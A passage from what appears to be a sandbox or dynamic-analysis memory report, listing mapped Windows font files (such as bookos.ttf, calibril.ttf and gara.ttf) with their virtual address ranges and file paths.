filename = "\\Windows\\Fonts\\BOD_CR.TTF" (normalized: "c:\\windows\\fonts\\bod_cr.ttf")
Region:
id = 967
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_i.ttf"
filename = "\\Windows\\Fonts\\BOD_I.TTF" (normalized: "c:\\windows\\fonts\\bod_i.ttf")
Region:
id = 968
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_i.ttf"
filename = "\\Windows\\Fonts\\BOD_I.TTF" (normalized: "c:\\windows\\fonts\\bod_i.ttf")
Region:
id = 969
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_pstc.ttf"
filename = "\\Windows\\Fonts\\BOD_PSTC.TTF" (normalized: "c:\\windows\\fonts\\bod_pstc.ttf")
Region:
id = 970
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_pstc.ttf"
filename = "\\Windows\\Fonts\\BOD_PSTC.TTF" (normalized: "c:\\windows\\fonts\\bod_pstc.ttf")
Region:
id = 971
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_r.ttf"
filename = "\\Windows\\Fonts\\BOD_R.TTF" (normalized: "c:\\windows\\fonts\\bod_r.ttf")
Region:
id = 972
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_r.ttf"
filename = "\\Windows\\Fonts\\BOD_R.TTF" (normalized: "c:\\windows\\fonts\\bod_r.ttf")
Region:
id = 973
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookos.ttf"
filename = "\\Windows\\Fonts\\BOOKOS.TTF" (normalized: "c:\\windows\\fonts\\bookos.ttf")
Region:
id = 974
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookos.ttf"
filename = "\\Windows\\Fonts\\BOOKOS.TTF" (normalized: "c:\\windows\\fonts\\bookos.ttf")
Region:
id = 975
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosb.ttf"
filename = "\\Windows\\Fonts\\BOOKOSB.TTF" (normalized: "c:\\windows\\fonts\\bookosb.ttf")
Region:
id = 976
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosb.ttf"
filename = "\\Windows\\Fonts\\BOOKOSB.TTF" (normalized: "c:\\windows\\fonts\\bookosb.ttf")
Region:
id = 977
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosbi.ttf"
filename = "\\Windows\\Fonts\\BOOKOSBI.TTF" (normalized: "c:\\windows\\fonts\\bookosbi.ttf")
Region:
id = 978
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosbi.ttf"
filename = "\\Windows\\Fonts\\BOOKOSBI.TTF" (normalized: "c:\\windows\\fonts\\bookosbi.ttf")
Region:
id = 979
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosi.ttf"
filename = "\\Windows\\Fonts\\BOOKOSI.TTF" (normalized: "c:\\windows\\fonts\\bookosi.ttf")
Region:
id = 980
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosi.ttf"
filename = "\\Windows\\Fonts\\BOOKOSI.TTF" (normalized: "c:\\windows\\fonts\\bookosi.ttf")
Region:
id = 981
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bradhitc.ttf"
filename = "\\Windows\\Fonts\\BRADHITC.TTF" (normalized: "c:\\windows\\fonts\\bradhitc.ttf")
Region:
id = 982
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bradhitc.ttf"
filename = "\\Windows\\Fonts\\BRADHITC.TTF" (normalized: "c:\\windows\\fonts\\bradhitc.ttf")
Region:
id = 983
start_va = 0x610000
end_va = 0x619fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "britanic.ttf"
filename = "\\Windows\\Fonts\\BRITANIC.TTF" (normalized: "c:\\windows\\fonts\\britanic.ttf")
Region:
id = 984
start_va = 0x610000
end_va = 0x619fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "britanic.ttf"
filename = "\\Windows\\Fonts\\BRITANIC.TTF" (normalized: "c:\\windows\\fonts\\britanic.ttf")
Region:
id = 985
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsb.ttf"
filename = "\\Windows\\Fonts\\BRLNSB.TTF" (normalized: "c:\\windows\\fonts\\brlnsb.ttf")
Region:
id = 986
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsb.ttf"
filename = "\\Windows\\Fonts\\BRLNSB.TTF" (normalized: "c:\\windows\\fonts\\brlnsb.ttf")
Region:
id = 987
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsdb.ttf"
filename = "\\Windows\\Fonts\\BRLNSDB.TTF" (normalized: "c:\\windows\\fonts\\brlnsdb.ttf")
Region:
id = 988
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsdb.ttf"
filename = "\\Windows\\Fonts\\BRLNSDB.TTF" (normalized: "c:\\windows\\fonts\\brlnsdb.ttf")
Region:
id = 989
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsr.ttf"
filename = "\\Windows\\Fonts\\BRLNSR.TTF" (normalized: "c:\\windows\\fonts\\brlnsr.ttf")
Region:
id = 990
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsr.ttf"
filename = "\\Windows\\Fonts\\BRLNSR.TTF" (normalized: "c:\\windows\\fonts\\brlnsr.ttf")
Region:
id = 991
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "broadw.ttf"
filename = "\\Windows\\Fonts\\BROADW.TTF" (normalized: "c:\\windows\\fonts\\broadw.ttf")
Region:
id = 992
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "broadw.ttf"
filename = "\\Windows\\Fonts\\BROADW.TTF" (normalized: "c:\\windows\\fonts\\broadw.ttf")
Region:
id = 993
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brushsci.ttf"
filename = "\\Windows\\Fonts\\BRUSHSCI.TTF" (normalized: "c:\\windows\\fonts\\brushsci.ttf")
Region:
id = 994
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brushsci.ttf"
filename = "\\Windows\\Fonts\\BRUSHSCI.TTF" (normalized: "c:\\windows\\fonts\\brushsci.ttf")
Region:
id = 995
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bssym7.ttf"
filename = "\\Windows\\Fonts\\BSSYM7.TTF" (normalized: "c:\\windows\\fonts\\bssym7.ttf")
Region:
id = 996
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bssym7.ttf"
filename = "\\Windows\\Fonts\\BSSYM7.TTF" (normalized: "c:\\windows\\fonts\\bssym7.ttf")
Region:
id = 997
start_va = 0x12b0000
end_va = 0x1369fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibril.ttf"
filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf")
Region:
id = 998
start_va = 0x12b0000
end_va = 0x1369fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibril.ttf"
filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf")
Region:
id = 999
start_va = 0x4ff0000
end_va = 0x50c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibrili.ttf"
filename = "\\Windows\\Fonts\\CalibriLI.ttf" (normalized: "c:\\windows\\fonts\\calibrili.ttf")
Region:
id = 1000
start_va = 0x4ff0000
end_va = 0x50c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibrili.ttf"
filename = "\\Windows\\Fonts\\CalibriLI.ttf" (normalized: "c:\\windows\\fonts\\calibrili.ttf")
Region:
id = 1001
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califb.ttf"
filename = "\\Windows\\Fonts\\CALIFB.TTF" (normalized: "c:\\windows\\fonts\\califb.ttf")
Region:
id = 1002
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califb.ttf"
filename = "\\Windows\\Fonts\\CALIFB.TTF" (normalized: "c:\\windows\\fonts\\califb.ttf")
Region:
id = 1003
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califi.ttf"
filename = "\\Windows\\Fonts\\CALIFI.TTF" (normalized: "c:\\windows\\fonts\\califi.ttf")
Region:
id = 1004
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califi.ttf"
filename = "\\Windows\\Fonts\\CALIFI.TTF" (normalized: "c:\\windows\\fonts\\califi.ttf")
Region:
id = 1005
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califr.ttf"
filename = "\\Windows\\Fonts\\CALIFR.TTF" (normalized: "c:\\windows\\fonts\\califr.ttf")
Region:
id = 1006
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califr.ttf"
filename = "\\Windows\\Fonts\\CALIFR.TTF" (normalized: "c:\\windows\\fonts\\califr.ttf")
Region:
id = 1007
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calist.ttf"
filename = "\\Windows\\Fonts\\CALIST.TTF" (normalized: "c:\\windows\\fonts\\calist.ttf")
Region:
id = 1008
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calist.ttf"
filename = "\\Windows\\Fonts\\CALIST.TTF" (normalized: "c:\\windows\\fonts\\calist.ttf")
Region:
id = 1009
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calistb.ttf"
filename = "\\Windows\\Fonts\\CALISTB.TTF" (normalized: "c:\\windows\\fonts\\calistb.ttf")
Region:
id = 1010
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calistb.ttf"
filename = "\\Windows\\Fonts\\CALISTB.TTF" (normalized: "c:\\windows\\fonts\\calistb.ttf")
Region:
id = 1011
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calistbi.ttf"
filename = "\\Windows\\Fonts\\CALISTBI.TTF" (normalized: "c:\\windows\\fonts\\calistbi.ttf")
Region:
id = 1012
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calistbi.ttf"
filename = "\\Windows\\Fonts\\CALISTBI.TTF" (normalized: "c:\\windows\\fonts\\calistbi.ttf")
Region:
id = 1013
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calisti.ttf"
filename = "\\Windows\\Fonts\\CALISTI.TTF" (normalized: "c:\\windows\\fonts\\calisti.ttf")
Region:
id = 1014
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calisti.ttf"
filename = "\\Windows\\Fonts\\CALISTI.TTF" (normalized: "c:\\windows\\fonts\\calisti.ttf")
Region:
id = 1015
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "castelar.ttf"
filename = "\\Windows\\Fonts\\CASTELAR.TTF" (normalized: "c:\\windows\\fonts\\castelar.ttf")
Region:
id = 1016
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "castelar.ttf"
filename = "\\Windows\\Fonts\\CASTELAR.TTF" (normalized: "c:\\windows\\fonts\\castelar.ttf")
Region:
id = 1017
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "censcbk.ttf"
filename = "\\Windows\\Fonts\\CENSCBK.TTF" (normalized: "c:\\windows\\fonts\\censcbk.ttf")
Region:
id = 1018
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "censcbk.ttf"
filename = "\\Windows\\Fonts\\CENSCBK.TTF" (normalized: "c:\\windows\\fonts\\censcbk.ttf")
Region:
id = 1019
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "centaur.ttf"
filename = "\\Windows\\Fonts\\CENTAUR.TTF" (normalized: "c:\\windows\\fonts\\centaur.ttf")
Region:
id = 1020
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "centaur.ttf"
filename = "\\Windows\\Fonts\\CENTAUR.TTF" (normalized: "c:\\windows\\fonts\\centaur.ttf")
Region:
id = 1021
start_va = 0x8b0000
end_va = 0x8d8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "century.ttf"
filename = "\\Windows\\Fonts\\CENTURY.TTF" (normalized: "c:\\windows\\fonts\\century.ttf")
Region:
id = 1022
start_va = 0x8b0000
end_va = 0x8d8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "century.ttf"
filename = "\\Windows\\Fonts\\CENTURY.TTF" (normalized: "c:\\windows\\fonts\\century.ttf")
Region:
id = 1023
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "chiller.ttf"
filename = "\\Windows\\Fonts\\CHILLER.TTF" (normalized: "c:\\windows\\fonts\\chiller.ttf")
Region:
id = 1024
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "chiller.ttf"
filename = "\\Windows\\Fonts\\CHILLER.TTF" (normalized: "c:\\windows\\fonts\\chiller.ttf")
Region:
id = 1025
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "colonna.ttf"
filename = "\\Windows\\Fonts\\COLONNA.TTF" (normalized: "c:\\windows\\fonts\\colonna.ttf")
Region:
id = 1026
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "colonna.ttf"
filename = "\\Windows\\Fonts\\COLONNA.TTF" (normalized: "c:\\windows\\fonts\\colonna.ttf")
Region:
id = 1027
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coopbl.ttf"
filename = "\\Windows\\Fonts\\COOPBL.TTF" (normalized: "c:\\windows\\fonts\\coopbl.ttf")
Region:
id = 1028
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coopbl.ttf"
filename = "\\Windows\\Fonts\\COOPBL.TTF" (normalized: "c:\\windows\\fonts\\coopbl.ttf")
Region:
id = 1029
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coprgtb.ttf"
filename = "\\Windows\\Fonts\\COPRGTB.TTF" (normalized: "c:\\windows\\fonts\\coprgtb.ttf")
Region:
id = 1030
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coprgtb.ttf"
filename = "\\Windows\\Fonts\\COPRGTB.TTF" (normalized: "c:\\windows\\fonts\\coprgtb.ttf")
Region:
id = 1031
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coprgtl.ttf"
filename = "\\Windows\\Fonts\\COPRGTL.TTF" (normalized: "c:\\windows\\fonts\\coprgtl.ttf")
Region:
id = 1032
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coprgtl.ttf"
filename = "\\Windows\\Fonts\\COPRGTL.TTF" (normalized: "c:\\windows\\fonts\\coprgtl.ttf")
Region:
id = 1033
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "curlz___.ttf"
filename = "\\Windows\\Fonts\\CURLZ___.TTF" (normalized: "c:\\windows\\fonts\\curlz___.ttf")
Region:
id = 1034
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "curlz___.ttf"
filename = "\\Windows\\Fonts\\CURLZ___.TTF" (normalized: "c:\\windows\\fonts\\curlz___.ttf")
Region:
id = 1035
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "elephnt.ttf"
filename = "\\Windows\\Fonts\\ELEPHNT.TTF" (normalized: "c:\\windows\\fonts\\elephnt.ttf")
Region:
id = 1036
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "elephnt.ttf"
filename = "\\Windows\\Fonts\\ELEPHNT.TTF" (normalized: "c:\\windows\\fonts\\elephnt.ttf")
Region:
id = 1037
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "elephnti.ttf"
filename = "\\Windows\\Fonts\\ELEPHNTI.TTF" (normalized: "c:\\windows\\fonts\\elephnti.ttf")
Region:
id = 1038
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "elephnti.ttf"
filename = "\\Windows\\Fonts\\ELEPHNTI.TTF" (normalized: "c:\\windows\\fonts\\elephnti.ttf")
Region:
id = 1039
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "engr.ttf"
filename = "\\Windows\\Fonts\\ENGR.TTF" (normalized: "c:\\windows\\fonts\\engr.ttf")
Region:
id = 1040
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "engr.ttf"
filename = "\\Windows\\Fonts\\ENGR.TTF" (normalized: "c:\\windows\\fonts\\engr.ttf")
Region:
id = 1041
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasbd.ttf"
filename = "\\Windows\\Fonts\\ERASBD.TTF" (normalized: "c:\\windows\\fonts\\erasbd.ttf")
Region:
id = 1042
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasbd.ttf"
filename = "\\Windows\\Fonts\\ERASBD.TTF" (normalized: "c:\\windows\\fonts\\erasbd.ttf")
Region:
id = 1043
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasdemi.ttf"
filename = "\\Windows\\Fonts\\ERASDEMI.TTF" (normalized: "c:\\windows\\fonts\\erasdemi.ttf")
Region:
id = 1044
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasdemi.ttf"
filename = "\\Windows\\Fonts\\ERASDEMI.TTF" (normalized: "c:\\windows\\fonts\\erasdemi.ttf")
Region:
id = 1045
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "eraslght.ttf"
filename = "\\Windows\\Fonts\\ERASLGHT.TTF" (normalized: "c:\\windows\\fonts\\eraslght.ttf")
Region:
id = 1046
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "eraslght.ttf"
filename = "\\Windows\\Fonts\\ERASLGHT.TTF" (normalized: "c:\\windows\\fonts\\eraslght.ttf")
Region:
id = 1047
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasmd.ttf"
filename = "\\Windows\\Fonts\\ERASMD.TTF" (normalized: "c:\\windows\\fonts\\erasmd.ttf")
Region:
id = 1048
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasmd.ttf"
filename = "\\Windows\\Fonts\\ERASMD.TTF" (normalized: "c:\\windows\\fonts\\erasmd.ttf")
Region:
id = 1049
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "felixti.ttf"
filename = "\\Windows\\Fonts\\FELIXTI.TTF" (normalized: "c:\\windows\\fonts\\felixti.ttf")
Region:
id = 1050
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "felixti.ttf"
filename = "\\Windows\\Fonts\\FELIXTI.TTF" (normalized: "c:\\windows\\fonts\\felixti.ttf")
Region:
id = 1051
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "forte.ttf"
filename = "\\Windows\\Fonts\\FORTE.TTF" (normalized: "c:\\windows\\fonts\\forte.ttf")
Region:
id = 1052
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "forte.ttf"
filename = "\\Windows\\Fonts\\FORTE.TTF" (normalized: "c:\\windows\\fonts\\forte.ttf")
Region:
id = 1053
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frabk.ttf"
filename = "\\Windows\\Fonts\\FRABK.TTF" (normalized: "c:\\windows\\fonts\\frabk.ttf")
Region:
id = 1054
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frabk.ttf"
filename = "\\Windows\\Fonts\\FRABK.TTF" (normalized: "c:\\windows\\fonts\\frabk.ttf")
Region:
id = 1055
start_va = 0x8b0000
end_va = 0x8d9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frabkit.ttf"
filename = "\\Windows\\Fonts\\FRABKIT.TTF" (normalized: "c:\\windows\\fonts\\frabkit.ttf")
Region:
id = 1056
start_va = 0x8b0000
end_va = 0x8d9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frabkit.ttf"
filename = "\\Windows\\Fonts\\FRABKIT.TTF" (normalized: "c:\\windows\\fonts\\frabkit.ttf")
Region:
id = 1057
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradm.ttf"
filename = "\\Windows\\Fonts\\FRADM.TTF" (normalized: "c:\\windows\\fonts\\fradm.ttf")
Region:
id = 1058
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradm.ttf"
filename = "\\Windows\\Fonts\\FRADM.TTF" (normalized: "c:\\windows\\fonts\\fradm.ttf")
Region:
id = 1059
start_va = 0x8b0000
end_va = 0x8ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradmcn.ttf"
filename = "\\Windows\\Fonts\\FRADMCN.TTF" (normalized: "c:\\windows\\fonts\\fradmcn.ttf")
Region:
id = 1060
start_va = 0x8b0000
end_va = 0x8ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradmcn.ttf"
filename = "\\Windows\\Fonts\\FRADMCN.TTF" (normalized: "c:\\windows\\fonts\\fradmcn.ttf")
Region:
id = 1061
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradmit.ttf"
filename = "\\Windows\\Fonts\\FRADMIT.TTF" (normalized: "c:\\windows\\fonts\\fradmit.ttf")
Region:
id = 1062
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradmit.ttf"
filename = "\\Windows\\Fonts\\FRADMIT.TTF" (normalized: "c:\\windows\\fonts\\fradmit.ttf")
Region:
id = 1063
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frahv.ttf"
filename = "\\Windows\\Fonts\\FRAHV.TTF" (normalized: "c:\\windows\\fonts\\frahv.ttf")
Region:
id = 1064
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frahv.ttf"
filename = "\\Windows\\Fonts\\FRAHV.TTF" (normalized: "c:\\windows\\fonts\\frahv.ttf")
Region:
id = 1065
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frahvit.ttf"
filename = "\\Windows\\Fonts\\FRAHVIT.TTF" (normalized: "c:\\windows\\fonts\\frahvit.ttf")
Region:
id = 1066
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frahvit.ttf"
filename = "\\Windows\\Fonts\\FRAHVIT.TTF" (normalized: "c:\\windows\\fonts\\frahvit.ttf")
Region:
id = 1067
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "framdcn.ttf"
filename = "\\Windows\\Fonts\\FRAMDCN.TTF" (normalized: "c:\\windows\\fonts\\framdcn.ttf")
Region:
id = 1068
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "framdcn.ttf"
filename = "\\Windows\\Fonts\\FRAMDCN.TTF" (normalized: "c:\\windows\\fonts\\framdcn.ttf")
Region:
id = 1069
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "freescpt.ttf"
filename = "\\Windows\\Fonts\\FREESCPT.TTF" (normalized: "c:\\windows\\fonts\\freescpt.ttf")
Region:
id = 1070
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "freescpt.ttf"
filename = "\\Windows\\Fonts\\FREESCPT.TTF" (normalized: "c:\\windows\\fonts\\freescpt.ttf")
Region:
id = 1071
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frscript.ttf"
filename = "\\Windows\\Fonts\\FRSCRIPT.TTF" (normalized: "c:\\windows\\fonts\\frscript.ttf")
Region:
id = 1072
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frscript.ttf"
filename = "\\Windows\\Fonts\\FRSCRIPT.TTF" (normalized: "c:\\windows\\fonts\\frscript.ttf")
Region:
id = 1073
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ftltlt.ttf"
filename = "\\Windows\\Fonts\\FTLTLT.TTF" (normalized: "c:\\windows\\fonts\\ftltlt.ttf")
Region:
id = 1074
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ftltlt.ttf"
filename = "\\Windows\\Fonts\\FTLTLT.TTF" (normalized: "c:\\windows\\fonts\\ftltlt.ttf")
Region:
id = 1075
start_va = 0x8b0000
end_va = 0x8e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gadugi.ttf"
filename = "\\Windows\\Fonts\\GADUGI.TTF" (normalized: "c:\\windows\\fonts\\gadugi.ttf")
Region:
id = 1076
start_va = 0x8b0000
end_va = 0x8e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gadugi.ttf"
filename = "\\Windows\\Fonts\\GADUGI.TTF" (normalized: "c:\\windows\\fonts\\gadugi.ttf")
Region:
id = 1077
start_va = 0x8b0000
end_va = 0x8e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gadugib.ttf"
filename = "\\Windows\\Fonts\\GADUGIB.TTF" (normalized: "c:\\windows\\fonts\\gadugib.ttf")
Region:
id = 1078
start_va = 0x8b0000
end_va = 0x8e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gadugib.ttf"
filename = "\\Windows\\Fonts\\GADUGIB.TTF" (normalized: "c:\\windows\\fonts\\gadugib.ttf")
Region:
id = 1079
start_va = 0x8b0000
end_va = 0x8e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gara.ttf"
filename = "\\Windows\\Fonts\\GARA.TTF" (normalized: "c:\\windows\\fonts\\gara.ttf")
Region:
id = 1080
start_va = 0x8b0000
end_va = 0x8e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gara.ttf"
filename = "\\Windows\\Fonts\\GARA.TTF" (normalized: "c:\\windows\\fonts\\gara.ttf")
Region:
id = 1081
start_va = 0x8b0000
end_va = 0x8e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "garabd.ttf"
filename = "\\Windows\\Fonts\\GARABD.TTF" (normalized: "c:\\windows\\fonts\\garabd.ttf")
Region:
id = 1082
start_va = 0x8b0000
